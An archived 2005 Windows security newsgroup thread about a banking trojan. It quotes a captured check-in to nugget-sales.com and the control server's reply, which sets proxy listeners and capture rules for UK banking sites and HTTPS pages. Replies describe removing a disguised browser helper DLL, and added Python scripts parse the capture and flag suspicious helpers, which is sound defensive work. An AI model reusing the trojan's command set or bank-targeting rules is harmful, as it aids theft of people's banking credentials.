
My puter was "calling home" to 83.149.82.168

Anonymous
April 18, 2005 2:06:04 PM

Archived from groups: microsoft.public.windowsxp.security_admin

I have manually removed a piece of malware from my system.
It was opening a lot of ports.
And every time it opened a new port
it was "calling home" to 83.149.82.168

I can provide a full Ethereal dump
and the 3 "bad" files I found
if anybody is interested.

I have sent an email to the ISP's abuse contact.

This is what Ethereal extracted:

POST /cgi-bin/ref.cgi?Sun%20Apr%2017%2016%3A58%3A13.593%202005 HTTP/1.0
Host: nugget-sales.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: close

i=2246824488&v=2805&os=WinNT5.1-2600&s=&h=&d=0&b=0&u=210&k=37103&m=37103&panic=0&c=United Kingdom&l=ENG&mo=0
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2005 04:00:09 GMT
Server: Apache/2.0.40 (Red Hat Linux)
Content-Length: 671
Connection: close
Content-Type: text/html; charset=ISO-8859-1

http +www.microsoft.com +Ba "Mozilla/4.0 (compatible\; MSIE 6.0\; Windows NT 5.1)"
rmold
socks 0.0.0.0:65535
httpp +0.0.0.0:65535
log +everything +Smz 1 9;setwnd 8 * * * +wclCME 60 1;timer
-qewrqrewq;timer +qewrqrewq -R+AIc 10000000 "setwnd 8 * * * -E"
setwnd 0 *halifax-online.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 1 *.lloydstsb.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 2 *.nwolb.com* * * +urfKPMWS 4096 2 200000
setwnd 3 *.hsbc.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 4 *.barclays.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 17 https://* * * +urfKPBMW 4096 1000 2
setwnd 18 * https://* * +urfKPBMW 4096 1000 2
setwnd 19 * * * +urfKP*MW 4096 2
http #hosts +I 60000
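As an added example (not code from this thread), here is an offline triage script for the capture above. The exchange is embedded as a constant copied from the post (with the two line-wrapped values rejoined) so it runs without the Ethereal dump. It pulls out the check-in fields and the host contacted, lists the listener lines and the URL patterns in the server's reply, and derives the site names those patterns mention, which is what you want when deciding who to notify and what to block. The field meanings are not interpreted; only what is literally in the capture is reported.

```python
"""Offline triage of the captured beacon and its reply (added example, not from the thread)."""
import re
from urllib.parse import parse_qs, unquote

# Constructed from the capture in the post; request body and the lloydstsb line rejoined.
CAPTURE = """\
POST /cgi-bin/ref.cgi?Sun%20Apr%2017%2016%3A58%3A13.593%202005 HTTP/1.0
Host: nugget-sales.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: close

i=2246824488&v=2805&os=WinNT5.1-2600&s=&h=&d=0&b=0&u=210&k=37103&m=37103&panic=0&c=United Kingdom&l=ENG&mo=0
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2005 04:00:09 GMT
Server: Apache/2.0.40 (Red Hat Linux)
Content-Length: 671
Connection: close
Content-Type: text/html; charset=ISO-8859-1

http +www.microsoft.com +Ba "Mozilla/4.0 (compatible\\; MSIE 6.0\\; Windows NT 5.1)"
rmold
socks 0.0.0.0:65535
httpp +0.0.0.0:65535
log +everything +Smz 1 9;setwnd 8 * * * +wclCME 60 1;timer
-qewrqrewq;timer +qewrqrewq -R+AIc 10000000 "setwnd 8 * * * -E"
setwnd 0 *halifax-online.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 1 *.lloydstsb.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 2 *.nwolb.com* * * +urfKPMWS 4096 2 200000
setwnd 3 *.hsbc.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 4 *.barclays.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 17 https://* * * +urfKPBMW 4096 1000 2
setwnd 18 * https://* * +urfKPBMW 4096 1000 2
setwnd 19 * * * +urfKP*MW 4096 2
http #hosts +I 60000
"""

STATUS_LINE = re.compile(r"^HTTP/\d\.\d \d{3} .*$", re.MULTILINE)
# Only lines that *start* with setwnd; the two inline "setwnd 8" fragments are left alone.
SETWND_LINE = re.compile(r"^setwnd\s+(\d+)\s+(\S+)\s+(\S+)\s+(\S+)", re.MULTILINE)


def split_exchange(text):
    """Return (request_head, request_body, response_head, response_body)."""
    m = STATUS_LINE.search(text)
    if not m:
        raise ValueError("no HTTP status line in capture")
    request, response = text[:m.start()], text[m.start():]
    req_head, _, req_body = request.partition("\n\n")
    resp_head, _, resp_body = response.partition("\n\n")
    return req_head, req_body.strip(), resp_head, resp_body.strip()


def parse_headers(head):
    """Split a header block into (start line, {lower-cased name: value})."""
    lines = head.splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def parse_beacon(req_head, req_body):
    """Decode the check-in: host, path, the timestamp in the query, UA and form fields."""
    start_line, headers = parse_headers(req_head)
    _method, target, _version = start_line.split(" ", 2)
    path, _, query = target.partition("?")
    fields = {k: v[0] for k, v in parse_qs(req_body, keep_blank_values=True).items()}
    return {"host": headers.get("host"), "path": path, "query": unquote(query),
            "user_agent": headers.get("user-agent"), "fields": fields}


def extract_rules(resp_body):
    """(rule id, [non-wildcard patterns]) for each line-leading setwnd entry."""
    return [(int(m.group(1)), [p for p in m.groups()[1:] if p != "*"])
            for m in SETWND_LINE.finditer(resp_body)]


def extract_listeners(resp_body):
    """The socks/httpp lines, with the bind address as written."""
    out = []
    for line in resp_body.splitlines():
        tok = line.split()
        if len(tok) > 1 and tok[0] in ("socks", "httpp"):
            out.append((tok[0], tok[1].lstrip("+")))
    return out


def domains_named(rules):
    """Site names mentioned by the patterns, wildcards stripped, scheme-only patterns dropped."""
    names = set()
    for _rid, pats in rules:
        for p in pats:
            core = p.strip("*").lstrip(".")
            if core and "://" not in core:
                names.add(core)
    return sorted(names)


def triage(capture=CAPTURE):
    req_head, req_body, resp_head, resp_body = split_exchange(capture)
    rules = extract_rules(resp_body)
    return {"beacon": parse_beacon(req_head, req_body),
            "server": parse_headers(resp_head)[1].get("server"),
            "rules": rules,
            "watched": sorted({p for _r, pats in rules for p in pats}),
            "domains": domains_named(rules),
            "listeners": extract_listeners(resp_body)}


if __name__ == "__main__":
    r = triage()
    print("check-in to", r["beacon"]["host"], "at", r["beacon"]["query"])
    for k, v in r["beacon"]["fields"].items():
        print(f"  {k} = {v!r}")
    print("listeners:", r["listeners"])
    print("patterns in reply:", r["watched"])
    print("sites named:", r["domains"])
```

Run it as-is to see the summary; point `triage()` at the body of another capture of the same shape to compare what a different infected host was sent.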
April 18, 2005 7:59:06 PM

-rehn- wrote:

> I have manually removed a malware from my system.
> It was opening a lot of ports.
> And every time it opened a new port
> it was "calling home" to 83.149.82.168
>
> I can provide a full Ethereal dump
> and the 3 "bad" files I found
> if anybody is interested.
>
> I have sent an email to the ISP's abuse contact.
>
> This is what Ethereal extracted:

(snip headers)

And did you have a question about this? Your computer was compromised.
Take steps to clean it up. Did you need to know how to do this? Do you
now have a current antivirus version installed, using updated
definitions, as well as a firewall?

Malke
--
MS MVP - Windows Shell/User
www.elephantboycomputers.com
In Memoriam - MVP Alex Nichol
The world is diminished without him.
Anonymous
May 25, 2005 5:58:58 PM

-rehn- wrote:
> I have manually removed a malware from my system.
> It was opening a lot of ports.
> And every time it opened a new port
> it was "calling home" to 83.149.82.168
>
> I can provide a full Ethereal dump
> and the 3 "bad" files I found
> if anybody is interested.
>
> I have sent an email to the ISP's abuse contact.
>
> This is what Ethereal extracted:
>
> POST /cgi-bin/ref.cgi?Sun%20Apr%2017%2016%3A58%3A13.593%202005 HTTP/1.0
> Host: nugget-sales.com
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 108
> Accept: */*
> Accept-Language: en
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
> Connection: close
>
> i=2246824488&v=2805&os=WinNT5.1-2600&s=&h=&d=0&b=0&u=210&k=37103&m=37103&panic=0&c=United Kingdom&l=ENG&mo=0
> HTTP/1.1 200 OK
> Date: Mon, 18 Apr 2005 04:00:09 GMT
> Server: Apache/2.0.40 (Red Hat Linux)
> Content-Length: 671
> Connection: close
> Content-Type: text/html; charset=ISO-8859-1
>
> http +www.microsoft.com +Ba "Mozilla/4.0 (compatible\; MSIE 6.0\; Windows NT 5.1)"
> rmold
> socks 0.0.0.0:65535
> httpp +0.0.0.0:65535
> log +everything +Smz 1 9;setwnd 8 * * * +wclCME 60 1;timer
> -qewrqrewq;timer +qewrqrewq -R+AIc 10000000 "setwnd 8 * * * -E"
> setwnd 0 *halifax-online.co.uk* * * +urfKPMWS 4096 2 200000
> setwnd 1 *.lloydstsb.co.uk* * * +urfKPMWS 4096 2 200000
> setwnd 2 *.nwolb.com* * * +urfKPMWS 4096 2 200000
> setwnd 3 *.hsbc.co.uk* * * +urfKPMWS 4096 2 200000
> setwnd 4 *.barclays.co.uk* * * +urfKPMWS 4096 2 200000
> setwnd 17 https://* * * +urfKPBMW 4096 1000 2
> setwnd 18 * https://* * +urfKPBMW 4096 1000 2
> setwnd 19 * * * +urfKP*MW 4096 2
> http #hosts +I 60000


Hi, I found this baby on four PCs/servers in our network.
I took the same approach you did but found nothing.
Then I ran "HijackThis" and did a scan.
I located a strange BHO (Browser Helper Object) pointing to a dll in
\windows\system32. It had a different name on all machines but always
looked like an MS file. I did not have a version info tab in the
properties though. It was about 71 KB and accompanied by a .dat file with
the same name.
I tried to delete it but it was in use so I used a tool which can do that
at startup. When the file was gone so was the traffic to
nugget-sales.com. It was not detected by any antivirus or antispyware
engine so I reported it to virus@ca.com. They have now analyzed it and
confirmed it to be malware.
Good luck,
Ruud


--
grom_home
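The checks Ruud describes (a BHO whose DLL sits in system32, has no version info tab, and has a same-named .dat next to it) can be turned into a small triage script. This is an added example, not Ruud's tool or HijackThis: on Windows it reads the BHO list from HKLM, resolves each CLSID to its InprocServer32 DLL and gathers those facts via the registry and version.dll; elsewhere it runs over a constructed sample so the scoring logic can be read and tested. The CLSIDs, paths and the 60 to 80 KB size window are constructed from the post's "about 71 KB", not signatures.

```python
"""BHO triage along the lines of the post above (added example, not the poster's tool)."""
import os
import sys
from dataclasses import dataclass


@dataclass
class Bho:
    clsid: str
    path: str              # DLL registered under CLSID\{clsid}\InprocServer32
    size: int              # bytes on disk
    has_version_info: bool  # False is what "no version info tab" looks like
    dat_sibling: bool      # <same base name>.dat beside the DLL


def reasons_to_inspect(b):
    """Heuristics drawn from the post; each hit is a reason to look, not a verdict."""
    reasons = []
    norm = b.path.replace("\\", "/").lower()
    if "/system32/" in norm:
        reasons.append("registered from system32")
    if not b.has_version_info:
        reasons.append("no version info resource")
    if b.dat_sibling:
        reasons.append("same-named .dat beside the DLL")
    if 60_000 <= b.size <= 80_000:  # constructed window around the reported ~71 KB
        reasons.append("size close to the reported ~71 KB")
    return reasons


def triage(records, threshold=2):
    """Return [(path, reasons)] for records that collect at least `threshold` reasons."""
    flagged = []
    for b in records:
        r = reasons_to_inspect(b)
        if len(r) >= threshold:
            flagged.append((b.path, r))
    return flagged


def enumerate_bhos():
    """Windows only: walk HKLM's BHO list and build a Bho record per resolvable CLSID."""
    import ctypes
    import winreg
    bho_key = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects"
    found = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, bho_key) as k:
        for i in range(winreg.QueryInfoKey(k)[0]):
            clsid = winreg.EnumKey(k, i)
            try:
                with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, rf"CLSID\{clsid}\InprocServer32") as s:
                    path = os.path.expandvars(winreg.QueryValueEx(s, "")[0].strip('"'))
            except OSError:
                continue  # CLSID listed but no server registered; check by hand
            if not os.path.isfile(path):
                continue
            # GetFileVersionInfoSizeW returns 0 when the file carries no version resource.
            has_ver = bool(ctypes.windll.version.GetFileVersionInfoSizeW(path, None))
            base, _ext = os.path.splitext(path)
            found.append(Bho(clsid, path, os.path.getsize(path), has_ver,
                             os.path.isfile(base + ".dat")))
    return found


# Constructed sample: one record shaped like the post's find, one like an ordinary BHO.
SAMPLE = [
    Bho("{00000000-0000-0000-0000-000000000001}", r"C:\WINDOWS\system32\msxyzz.dll",
        72_704, False, True),
    Bho("{00000000-0000-0000-0000-000000000002}", r"C:\Program Files\Vendor\helper.dll",
        310_272, True, False),
]

if __name__ == "__main__":
    records = enumerate_bhos() if sys.platform == "win32" else SAMPLE
    for path, reasons in triage(records):
        print(path, "->", "; ".join(reasons))
    if not records:
        print("no BHOs registered")
```

A hit only says "open this one in a file-analysis tool or submit it to your AV vendor", as Ruud did; the .dat sibling and the missing version resource are the two observations from the post that a legitimate browser add-on rarely shares.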